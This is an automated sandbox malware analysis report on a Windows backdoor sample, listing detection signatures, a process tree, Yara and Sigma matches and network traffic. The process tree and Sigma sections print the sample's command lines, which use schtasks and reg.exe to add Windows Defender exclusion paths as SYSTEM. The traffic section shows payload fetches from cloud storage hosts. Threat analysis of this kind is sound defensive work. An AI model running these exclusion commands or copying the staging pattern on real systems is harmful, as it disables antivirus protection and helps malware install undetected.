Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2749837485743-7684385786.05.exe

Overview

General Information

Sample name:2749837485743-7684385786.05.exe
Analysis ID:1584634
MD5:5b695fabfcd1da54f7c193ef5f11ef6a
SHA1:8097a65d6e89522851b53b831aaf45afb9f0267b
SHA256:697d0f16d16ac7df2254469ab782d57a121c487ddaacca4a71f82bd976490ff2
Tags:backdoorexemsisilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 5oqa98.exe (PID: 1488 cmdline: C:\Users\user\Documents\5oqa98.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • 5oqa98.exe (PID: 7688 cmdline: C:\Users\user\Documents\5oqa98.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 6612 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7692 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 7404 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3348 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 3632 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6852 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6568 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 896 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 5736 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2600 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3132 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5480 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 6400 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7124 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5640 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1672 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cmd.exe (PID: 7888 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 1820 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 3148 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6428 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 3628 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 3964 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 2856 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 7136 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Unpacked PEs

SourceRuleDescriptionAuthorStrings
7.2.5oqa98.exe.2890000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
8.2.5oqa98.exe.28f0000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

barindex
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\5oqa98.exe, ParentImage: C:\Users\user\Documents\5oqa98.exe, ParentProcessId: 7688, ParentProcessName: 5oqa98.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 6612, ProcessName: cmd.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\5oqa98.exe, ParentImage: C:\Users\user\Documents\5oqa98.exe, ParentProcessId: 7688, ParentProcessName: 5oqa98.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 6612, ProcessName: cmd.exe
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Source: Process startedAuthor: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7888, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 1820, ProcessName: reg.exe
Sigma detected: Windows Defender Exclusions Added - Registry
Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 1820, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 39.103.20.26:443 -> 192.168.2.9:49974 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.9:49981 version: TLS 1.2
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2575032341.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, naBa3A.exe.8.dr
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: R:\Everest\Tree\bin\WatersPrintCaptureProxy.pdb source: 2749837485743-7684385786.05.exe
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 5oqa98.exe, 00000007.00000000.2349192191.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe, 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe, 00000008.00000002.2575168949.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe, 00000008.00000000.2365695167.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 5oqa98.exe.0.dr

Change of critical system settings

barindex
Adds extensions / path to Windows Defender exclusion list (Registry)
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramDataJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\UsersJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)Jump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\Documents\5oqa98.exeCode function: 7_2_00007FF8FF5DA1B8 FindFirstFileExW,7_2_00007FF8FF5DA1B8
Source: C:\Users\user\Documents\5oqa98.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]7_2_000000014000DFFE
Source: C:\Users\user\Documents\5oqa98.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]7_2_000000014000DDFF
Source: C:\Users\user\Documents\5oqa98.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]7_2_0000000140011270
Source: C:\Users\user\Documents\5oqa98.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]7_2_000000014000DE96
Source: C:\Users\user\Documents\5oqa98.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]7_2_000000014000DEFB
Source: C:\Users\user\Documents\5oqa98.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]7_2_000000014000E178
Source: C:\Users\user\Documents\5oqa98.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]7_2_000000014000DDD9
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Documents\5oqa98.exeCode function: 8_2_0062B085 InternetReadFile,8_2_0062B085
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: hu5wd1.oss-cn-beijing.aliyuncs.com
Source: global trafficDNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 189atohci.sys.0.dr, 5oqa98.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
Source: 189atohci.sys.0.dr, 5oqa98.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: 5oqa98.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: 5oqa98.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 5oqa98.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: 5oqa98.exe.0.drString found in binary or memory: http://s.symcd.com0_
Source: 5oqa98.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 5oqa98.exe.0.drString found in binary or memory: http://s2.symcb.com0
Source: 5oqa98.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 5oqa98.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 5oqa98.exe.0.drString found in binary or memory: http://sv.symcd.com0&
Source: 5oqa98.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: 5oqa98.exe.0.drString found in binary or memory: http://sw.symcd.com0
Source: 5oqa98.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: 5oqa98.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 189atohci.sys.0.dr, 5oqa98.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 5oqa98.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 189atohci.sys.0.dr, 5oqa98.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 189atohci.sys.0.dr, 5oqa98.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 5oqa98.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 5oqa98.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
Source: 5oqa98.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
Source: 5oqa98.exe, 00000008.00000002.2572103669.00000000005BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hang
Source: 5oqa98.exe, 00000008.00000002.2572103669.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/
Source: 5oqa98.exe, 00000008.00000002.2572103669.00000000005BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/$
Source: 5oqa98.exe, 00000008.00000002.2572103669.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1003
Source: 5oqa98.exe, 00000008.00000002.2572103669.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000146000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg
Source: 5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg:7y8
Source: 5oqa98.exe, 00000008.00000002.2575032341.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000141000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000146000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51
Source: 5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2575032341.0000000003E6B000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000141000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2572103669.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 5oqa98.exe, 00000008.00000002.2571919128.0000000000146000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg
Source: 5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg4/
Source: 5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgF7e8
Source: 5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgJ7i8
Source: 5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgT/
Source: 5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgd/
Source: 5oqa98.exe, 00000008.00000002.2574792265.0000000003DE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgr718
